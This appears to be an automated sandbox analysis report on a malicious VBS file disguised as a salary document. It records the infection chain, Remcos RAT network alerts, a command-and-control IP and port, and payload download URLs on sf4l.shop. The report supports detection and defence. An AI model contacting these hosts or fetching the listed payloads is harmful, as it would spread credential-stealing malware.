Windows Analysis Report
Salary Revision_pdf.vbs

AI detected suspicious sample

Source: Yara match	File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49930 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1637195965.0000000003126000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Core.pdbo source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ore.pdbi source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_209010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_209010F1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_20906580 FindFirstFileExA,	7_2_20906580
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,	11_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	12_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407898

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49960 -> 154.216.18.214:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49971 -> 154.216.18.214:2404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 154.216.18.214

Source: global traffic

TCP traffic: 192.168.2.7:49960 -> 154.216.18.214:2404

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49972 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49930 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET /zWAbmrmP/Diwani.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.214

Source: global traffic	HTTP traffic detected: GET /zWAbmrmP/Diwani.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: msiexec.exe, 0000000B.00000003.1810983251.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000B.00000003.1810983251.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: sf4l.shop
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: wscript.exe, 00000000.00000002.1356231389.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333582119.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355352075.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343793550.0000023D9788D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356231389.0000023D97822000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355352075.0000023D9781D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1355418070.0000023D977D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354833341.0000023D977CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enG=Def
Source: wscript.exe, 00000000.00000003.1343793550.0000023D9784B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e936f3372f
Source: msiexec.exe, 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1854570981.0000000005066000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1794345263.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634426863.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1779759485.000000000506C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000005009000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1789210479.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1854784125.000000000506F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpp
Source: powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E66A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf4l.shop
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv528A.tmp.11.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comppData
Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 0000000B.00000002.1811369548.00000000029A2000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
